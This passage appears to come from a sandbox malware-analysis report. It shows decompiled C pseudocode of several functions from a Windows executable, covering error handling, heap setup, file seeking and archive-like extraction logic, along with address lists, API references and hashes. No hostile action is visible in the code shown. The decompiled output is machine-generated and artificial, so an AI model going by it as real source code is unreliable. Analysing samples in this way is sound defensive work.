                              							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
                              							_t64 = _t39;
                              						}
                              						E0040640D(_t65 - 0x14, _t64);
                              						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
                              							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
                              							goto L12;
                              						} else {
                              							_t33 = GetLastError();
                              						}
                              					}
                              				} else {
                              					_push(8);
                              					_t43 = E00403A76();
                              					if(_t43 == 0) {
                              						_t43 = 0;
                              					} else {
                              						 *((intOrPtr*)(_t43 + 4)) = 0;
                              						 *_t43 = 0x41b600;
                              					}
                              					E0040640D(_t65 - 0x10, _t43);
                              					L12:
                              					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
                              				}
                              				_t62 = _t33;
                              				_t34 =  *((intOrPtr*)(_t65 - 0x10));
                              				 *(_t65 - 4) = 0;
                              				if(_t34 != 0) {
                              					 *((intOrPtr*)( *_t34 + 8))(_t34);
                              				}
                              				_t35 =  *((intOrPtr*)(_t65 - 0x14));
                              				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                              				if(_t35 != 0) {
                              					 *((intOrPtr*)( *_t35 + 8))(_t35);
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
                              				return _t62;
                              			}
                              0x00408907
                              0x0040890c
                              0x0040890d
                              0x00408913
                              0x00408915
                              0x00408918
                              0x0040891b
                              0x00408921
                              0x00408925
                              0x0040894e
                              0x00000000
                              0x00408950
                              0x00408950
                              0x00408952
                              0x0040895a
                              0x0040897b
                              0x0040895c
                              0x0040895c
                              0x00408963
                              0x00408966
                              0x0040896a
                              0x00408970
                              0x00408977
                              0x00408977
                              0x00408981
                              0x00408992
                              0x0040899f
                              0x00000000
                              0x00408994
                              0x00408994
                              0x00408994
                              0x00408992
                              0x00408927
                              0x00408927
                              0x00408929
                              0x00408931
                              0x0040893e
                              0x00408933
                              0x00408933
                              0x00408936
                              0x00408936
                              0x00408944
                              0x004089a2
                              0x004089b3
                              0x004089b3
                              0x004089b8
                              0x004089ba
                              0x004089bf
                              0x004089c2
                              0x004089c7
                              0x004089c7
                              0x004089ca
                              0x004089cd
                              0x004089d3
                              0x004089d8
                              0x004089d8
                              0x004089e3
                              0x004089eb

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408907
                              • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID:
                              • API String ID: 1057991267-0
                              • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                              • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
                              				void* _t17;
                              				void* _t20;
                              				void* _t21;
                              				void* _t24;
                              				long _t27;
                              				void* _t31;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				void* _t46;
                              
                              				_t51 = __eflags;
                              				_t39 = __edx;
                              				E00413954(E0041965C, _t46);
                              				_t41 = __ecx;
                              				_t44 = __edx;
                              				E00405268(_t46 - 0x1c);
                              				while(1) {
                              					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                              					_push(_t44);
                              					_push(_t41);
                              					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
                              					_t31 = _t46 - 0x1c;
                              					if(_t17 == 0) {
                              						break;
                              					}
                              					_t21 = E004051A4(_t31);
                              					_t53 = _t21;
                              					if(_t21 == 0) {
                              						_t31 = _t46 - 0x1c;
                              						break;
                              					} else {
                              						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
                              						E004051A4(_t46 - 0x1c);
                              						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                              						_t24 = E004058CD( *_t44, _t39, _t53); // executed
                              						if(_t24 != 0) {
                              							L6:
                              							E00405268(_t46 - 0x1c);
                              							continue;
                              						} else {
                              							if(E0040498D( *_t44) != 0) {
                              								_t20 = 1;
                              							} else {
                              								_t27 = GetLastError();
                              								_t51 = _t27 - 0xb7;
                              								if(_t27 != 0xb7) {
                              									L9:
                              									_t20 = 0;
                              									__eflags = 0;
                              								} else {
                              									goto L6;
                              								}
                              							}
                              						}
                              					}
                              					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                              					return _t20;
                              				}
                              				E004051A4(_t31);
                              				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                              				goto L9;
                              			}
                              0x004051c8
                              0x004051c8
                              0x004051cd
                              0x004051d7
                              0x004051d9
                              0x004051de
                              0x004051e3
                              0x004051e3
                              0x004051e7
                              0x004051e8
                              0x004051ec
                              0x004051f3
                              0x004051f6
                              0x00000000
                              0x00000000
                              0x004051f8
                              0x004051fd
                              0x004051ff
                              0x00405243
                              0x00000000
                              0x00405201
                              0x00405201
                              0x00405208
                              0x00405210
                              0x00405218
                              0x0040521f
                              0x00405239
                              0x0040523c
                              0x00000000
                              0x00405221
                              0x0040522a
                              0x00405264
                              0x0040522c
                              0x0040522c
                              0x00405232
                              0x00405237
                              0x00405254
                              0x00405254
                              0x00405254
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405237
                              0x0040522a
                              0x0040521f
                              0x0040525b
                              0x00405263
                              0x00405263
                              0x00405246
                              0x0040524e
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 004051CD
                                • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                              • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID:
                              • API String ID: 2901101390-0
                              • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                              • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                              • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004159F8(void* __ecx, intOrPtr _a4) {
                              				void* _t6;
                              				intOrPtr _t8;
                              				void* _t9;
                              				void* _t10;
                              				void* _t12;
                              
                              				_t12 = __ecx;
                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                              				_t15 = _t6;
                              				 *0x425a34 = _t6;
                              				if(_t6 == 0) {
                              					L7:
                              					return 0;
                              				} else {
                              					_t8 = E004158B0(_t12, _t15);
                              					 *0x425a38 = _t8;
                              					if(_t8 != 3) {
                              						__eflags = _t8 - 2;
                              						if(_t8 != 2) {
                              							goto L8;
                              						} else {
                              							_t10 = E0041659C();
                              							goto L5;
                              						}
                              					} else {
                              						_t10 = E00415A55(0x3f8);
                              						L5:
                              						if(_t10 != 0) {
                              							L8:
                              							_t9 = 1;
                              							return _t9;
                              						} else {
                              							HeapDestroy( *0x425a34);
                              							goto L7;
                              						}
                              					}
                              				}
                              			}
                              0x004159f8
                              0x00415a09
                              0x00415a0f
                              0x00415a11
                              0x00415a16
                              0x00415a4e
                              0x00415a50
                              0x00415a18
                              0x00415a18
                              0x00415a20
                              0x00415a25
                              0x00415a34
                              0x00415a37
                              0x00000000
                              0x00415a39
                              0x00415a39
                              0x00000000
                              0x00415a39
                              0x00415a27
                              0x00415a2c
                              0x00415a3e
                              0x00415a40
                              0x00415a51
                              0x00415a53
                              0x00415a54
                              0x00415a42
                              0x00415a48
                              0x00000000
                              0x00415a48
                              0x00415a40
                              0x00415a25

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                              • HeapDestroy.KERNEL32 ref: 00415A48
                                • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocCreateDestroyVersion
                              • String ID:
                              • API String ID: 2507506473-0
                              • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                              • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                              • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
                              				long _v8;
                              				long _v12;
                              				long _t12;
                              				long _t13;
                              				long* _t14;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t12 = _a4;
                              				_v8 = _a8;
                              				_v12 = _t12;
                              				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
                              				_v12 = _t13;
                              				if(_t13 != 0xffffffff || GetLastError() == 0) {
                              					_t14 = _a16;
                              					 *_t14 = _v12;
                              					_t14[1] = _v8;
                              					return 1;
                              				} else {
                              					return 0;
                              				}
                              			}
                              0x00405ad1
                              0x00405ad2
                              0x00405ad9
                              0x00405adc
                              0x00405ae2
                              0x00405ae9
                              0x00405af2
                              0x00405af5
                              0x00405b05
                              0x00405b0b
                              0x00405b10
                              0x00000000
                              0x00405b01
                              0x00000000
                              0x00405b01

                              APIs
                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                              • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer
                              • String ID:
                              • API String ID: 2976181284-0
                              • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                              • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                              • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E0040BBC9(signed char __edx) {
                              				signed int _t287;
                              				signed char _t289;
                              				signed int _t291;
                              				signed char _t292;
                              				signed char _t295;
                              				signed char _t305;
                              				intOrPtr _t307;
                              				signed char _t308;
                              				signed char _t314;
                              				intOrPtr _t315;
                              				signed char _t323;
                              				signed char _t325;
                              				signed char _t329;
                              				signed char _t330;
                              				signed char _t334;
                              				signed char _t335;
                              				signed char _t340;
                              				signed char _t345;
                              				signed char _t349;
                              				signed char _t351;
                              				signed char _t352;
                              				signed char _t356;
                              				signed char _t368;
                              				signed char _t372;
                              				signed int _t380;
                              				intOrPtr _t388;
                              				intOrPtr _t397;
                              				signed char _t401;
                              				signed char _t407;
                              				signed char _t408;
                              				intOrPtr _t410;
                              				intOrPtr _t475;
                              				signed char _t485;
                              				signed int _t488;
                              				signed char _t489;
                              				intOrPtr* _t490;
                              				signed int _t492;
                              				intOrPtr _t498;
                              				signed int _t501;
                              				signed int _t502;
                              				void* _t503;
                              				signed char _t506;
                              				signed int _t508;
                              				intOrPtr _t509;
                              				void* _t510;
                              				void* _t512;
                              
                              				_t485 = __edx;
                              				_t287 = E00413954(E0041A262, _t510);
                              				_t407 = 0;
                              				 *(_t510 - 4) = 0;
                              				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
                              				_t289 =  *(_t510 + 0x18);
                              				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
                              				 *(_t510 + 0x18) = _t289;
                              				if(_t289 != 0) {
                              					 *((intOrPtr*)( *_t289 + 4))(_t289);
                              				}
                              				 *(_t510 - 4) = 1;
                              				 *(_t510 - 0x1c) = _t407;
                              				 *(_t510 - 0x18) = _t407;
                              				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
                              				if( *((char*)(_t510 + 0x17)) != 0) {
                              					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
                              				}
                              				if( *(_t510 + 0x10) != _t407) {
                              					E00402155(_t510 - 0x30);
                              					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              					_t291 = 0;
                              					__eflags = 0;
                              					 *(_t510 - 4) = 2;
                              					 *(_t510 - 0x34) = 0;
                              					while(1) {
                              						__eflags = _t291 -  *(_t510 + 0x10);
                              						if(_t291 >=  *(_t510 + 0x10)) {
                              							break;
                              						}
                              						__eflags =  *((char*)(_t510 + 0x17));
                              						if( *((char*)(_t510 + 0x17)) == 0) {
                              							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
                              						}
                              						_t496 =  *(_t510 + 8);
                              						 *(_t510 - 0x38) = _t291;
                              						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
                              						__eflags = _t508 - 0xffffffff;
                              						if(_t508 != 0xffffffff) {
                              							_t380 =  *(_t510 - 0x28);
                              							__eflags = _t380 - _t407;
                              							if(_t380 == _t407) {
                              								L16:
                              								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
                              								 *(_t510 - 0x78) = _t508;
                              								E0040C3F8(_t510 - 0x74);
                              								 *(_t510 - 0x5c) = _t407;
                              								 *(_t510 - 0x58) = _t407;
                              								_push(_t510 - 0x7c);
                              								 *(_t510 - 4) = 5;
                              								E0040C46D(_t510 - 0x30);
                              								 *(_t510 - 4) = 2;
                              								E004042AD(_t510 - 0x74);
                              								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
                              								_t67 = _t510 - 0x1c;
                              								 *_t67 =  *(_t510 - 0x1c) + _t475;
                              								__eflags =  *_t67;
                              								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                              								asm("adc [ebp-0x18], edx");
                              								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
                              								 *(_t388 + 0x24) = _t485;
                              								L17:
                              								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
                              								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
                              								_t509 =  *((intOrPtr*)(_t498 + 0x10));
                              								while(1) {
                              									_t393 =  *(_t510 - 0x38) - _t410;
                              									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
                              									if(_t509 >  *(_t510 - 0x38) - _t410) {
                              										goto L13;
                              									}
                              									_t87 = _t498 + 8; // 0xa
                              									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
                              									_t509 = _t509 + 1;
                              								}
                              								goto L13;
                              							}
                              							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
                              							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
                              							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
                              								goto L17;
                              							}
                              							goto L16;
                              						} else {
                              							_push(_t508);
                              							_push(_t291);
                              							_push(E0040C30E(_t510 - 0x130));
                              							 *(_t510 - 4) = 3;
                              							E0040C46D(_t510 - 0x30);
                              							 *(_t510 - 4) = 2;
                              							E004042AD(_t510 - 0x128);
                              							L13:
                              							_t291 =  *(_t510 - 0x34) + 1;
                              							_t407 = 0;
                              							 *(_t510 - 0x34) = _t291;
                              							continue;
                              						}
                              					}
                              					_t292 =  *(_t510 + 0x18);
                              					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
                              					if(__eflags == 0) {
                              						E0040AC6A(_t510 - 0x108, __eflags, 1);
                              						_push(0x38);
                              						 *(_t510 - 4) = 7;
                              						 *(_t510 - 0x40) = _t407;
                              						 *(_t510 - 0x3c) = _t407;
                              						 *(_t510 - 0x1c) = _t407;
                              						 *(_t510 - 0x18) = _t407;
                              						_t295 = E00403A76();
                              						 *(_t510 + 0x10) = _t295;
                              						__eflags = _t295 - _t407;
                              						 *(_t510 - 4) = 8;
                              						if(_t295 == _t407) {
                              							_t501 = 0;
                              							__eflags = 0;
                              						} else {
                              							_t501 = E004072A1(_t295);
                              						}
                              						_t488 = _t501;
                              						__eflags = _t501 - _t407;
                              						 *(_t510 - 4) = 7;
                              						 *(_t510 - 0x38) = _t488;
                              						 *(_t510 - 0x14) = _t501;
                              						if(_t501 != _t407) {
                              							 *((intOrPtr*)( *_t501 + 4))(_t501);
                              						}
                              						_push(_t407);
                              						 *(_t510 - 4) = 9;
                              						E00407334(_t501,  *(_t510 + 0x18));
                              						_t502 = 0;
                              						__eflags = 0;
                              						 *(_t510 + 0x14) = 0;
                              						while(1) {
                              							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
                              							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
                              							 *(_t488 + 0x20) =  *(_t510 - 0x40);
                              							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
                              							_t489 = E00407410(_t488);
                              							__eflags = _t489 - _t407;
                              							if(_t489 != _t407) {
                              								break;
                              							}
                              							__eflags = _t502 -  *(_t510 - 0x28);
                              							if(_t502 <  *(_t510 - 0x28)) {
                              								_push(0x38);
                              								 *(_t510 - 0x48) = _t407;
                              								 *(_t510 - 0x44) = _t407;
                              								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
                              								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
                              								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
                              								_t305 = E00403A76();
                              								 *(_t510 + 0xc) = _t305;
                              								__eflags = _t305 - _t407;
                              								 *(_t510 - 4) = 0xb;
                              								if(_t305 == _t407) {
                              									_t408 = 0;
                              									__eflags = 0;
                              								} else {
                              									_t408 = E0040C5E8(_t305);
                              								}
                              								__eflags = _t408;
                              								 *(_t510 - 0x34) = _t408;
                              								 *(_t510 - 4) = 9;
                              								 *(_t510 + 0x10) = _t408;
                              								if(_t408 != 0) {
                              									 *((intOrPtr*)( *_t408 + 4))(_t408);
                              								}
                              								 *(_t510 - 4) = 0xc;
                              								_t503 =  *(_t510 + 8) + 0x10;
                              								_t307 =  *_t490;
                              								__eflags = _t307 - 0xffffffff;
                              								if(_t307 == 0xffffffff) {
                              									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
                              								}
                              								__eflags =  *( *(_t510 + 8) + 0x1e0);
                              								_t173 = _t490 + 8; // 0x8
                              								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
                              								__eflags = _t308;
                              								 *(_t510 + 0xc) = _t308;
                              								if(_t308 == 0) {
                              									__eflags =  *_t490 - 0xffffffff;
                              									if( *_t490 == 0xffffffff) {
                              										_t492 =  *(_t490 + 4) << 2;
                              										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
                              										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
                              										 *(_t510 - 0x44) = _t485;
                              										 *(_t510 - 4) = 0xe;
                              										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
                              										asm("adc edx, [esi+0x14c]");
                              										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
                              										_t506 = _t314;
                              										__eflags = _t506 - 1;
                              										if(_t506 != 1) {
                              											__eflags = _t506 - 0x80004001;
                              											if(_t506 != 0x80004001) {
                              												__eflags = _t506;
                              												if(_t506 == 0) {
                              													_t315 =  *((intOrPtr*)(_t408 + 0x18));
                              													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
                              													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
                              														 *(_t510 - 4) = 9;
                              														E00403800(_t510 + 0x10);
                              														L91:
                              														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
                              														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
                              														_t488 =  *(_t510 - 0x38);
                              														_t502 =  *(_t510 + 0x14);
                              														asm("adc [ebp-0x18], eax");
                              														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
                              														asm("adc [ebp-0x3c], eax");
                              														_t407 = 0;
                              														continue;
                              													}
                              													_t506 = E0040CA4C(_t408, _t510, 2);
                              													_t323 =  *(_t510 + 0x10);
                              													__eflags = _t506;
                              													 *(_t510 - 4) = 9;
                              													if(_t506 == 0) {
                              														L86:
                              														__eflags = _t323;
                              														if(_t323 != 0) {
                              															 *((intOrPtr*)( *_t323 + 8))(_t323);
                              														}
                              														 *(_t510 - 4) = 9;
                              														goto L91;
                              													}
                              													__eflags = _t323;
                              													if(_t323 != 0) {
                              														 *((intOrPtr*)( *_t323 + 8))(_t323);
                              													}
                              													_t325 =  *(_t510 - 0x14);
                              													 *(_t510 - 4) = 7;
                              													__eflags = _t325;
                              													if(__eflags != 0) {
                              														 *((intOrPtr*)( *_t325 + 8))(_t325);
                              													}
                              													 *(_t510 - 4) = 2;
                              													E0040C380(_t510 - 0x108, __eflags);
                              													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              													 *(_t510 - 4) = 0x12;
                              													L82:
                              													E004042D6();
                              													 *(_t510 - 4) = 1;
                              													E004042AD(_t510 - 0x30);
                              													_t329 =  *(_t510 + 0x18);
                              													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
                              													__eflags = _t329;
                              													L83:
                              													if(__eflags != 0) {
                              														 *((intOrPtr*)( *_t329 + 8))(_t329);
                              													}
                              													_t330 = _t506;
                              													goto L92;
                              												}
                              												_t334 =  *(_t510 + 0x10);
                              												 *(_t510 - 4) = 9;
                              												__eflags = _t334;
                              												if(_t334 != 0) {
                              													 *((intOrPtr*)( *_t334 + 8))(_t334);
                              												}
                              												_t335 =  *(_t510 - 0x14);
                              												 *(_t510 - 4) = 7;
                              												__eflags = _t335;
                              												if(__eflags != 0) {
                              													 *((intOrPtr*)( *_t335 + 8))(_t335);
                              												}
                              												 *(_t510 - 4) = 2;
                              												E0040C380(_t510 - 0x108, __eflags);
                              												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              												 *(_t510 - 4) = 0x11;
                              												goto L82;
                              											}
                              											_t506 = E0040CA4C(_t408, _t510, 1);
                              											_t323 =  *(_t510 + 0x10);
                              											__eflags = _t506;
                              											 *(_t510 - 4) = 9;
                              											if(_t506 == 0) {
                              												goto L86;
                              											}
                              											__eflags = _t323;
                              											if(_t323 != 0) {
                              												 *((intOrPtr*)( *_t323 + 8))(_t323);
                              											}
                              											_t340 =  *(_t510 - 0x14);
                              											 *(_t510 - 4) = 7;
                              											__eflags = _t340;
                              											if(__eflags != 0) {
                              												 *((intOrPtr*)( *_t340 + 8))(_t340);
                              											}
                              											 *(_t510 - 4) = 2;
                              											E0040C380(_t510 - 0x108, __eflags);
                              											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              											 *(_t510 - 4) = 0x10;
                              											goto L82;
                              										}
                              										_t506 = E0040CA4C(_t408, _t510, 2);
                              										_t323 =  *(_t510 + 0x10);
                              										__eflags = _t506;
                              										 *(_t510 - 4) = 9;
                              										if(_t506 == 0) {
                              											goto L86;
                              										}
                              										__eflags = _t323;
                              										if(_t323 != 0) {
                              											 *((intOrPtr*)( *_t323 + 8))(_t323);
                              										}
                              										_t345 =  *(_t510 - 0x14);
                              										 *(_t510 - 4) = 7;
                              										__eflags = _t345;
                              										if(__eflags != 0) {
                              											 *((intOrPtr*)( *_t345 + 8))(_t345);
                              										}
                              										 *(_t510 - 4) = 2;
                              										E0040C380(_t510 - 0x108, __eflags);
                              										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
                              										 *(_t510 - 4) = 0xf;
                              										goto L82;
                              									}
                              									_t349 =  *(_t510 + 0x10);
                              									 *(_t510 - 4) = 9;
                              									__eflags = _t349;
                              									if(_t349 != 0) {
                              										 *((intOrPtr*)( *_t349 + 8))(_t349);
                              									}
                              									goto L91;
                              								} else {
                              									_t351 =  *(_t510 + 0x10);
                              									 *(_t510 - 4) = 9;
                              									__eflags = _t351;
                              									if(_t351 != 0) {
                              										 *((intOrPtr*)( *_t351 + 8))(_t351);
                              									}
                              									_t352 =  *(_t510 - 0x14);
                              									 *(_t510 - 4) = 7;
                              									__eflags = _t352;
                              									if(__eflags != 0) {
                              										 *((intOrPtr*)( *_t352 + 8))(_t352);
                              									}
                              									 *(_t510 - 4) = 2;
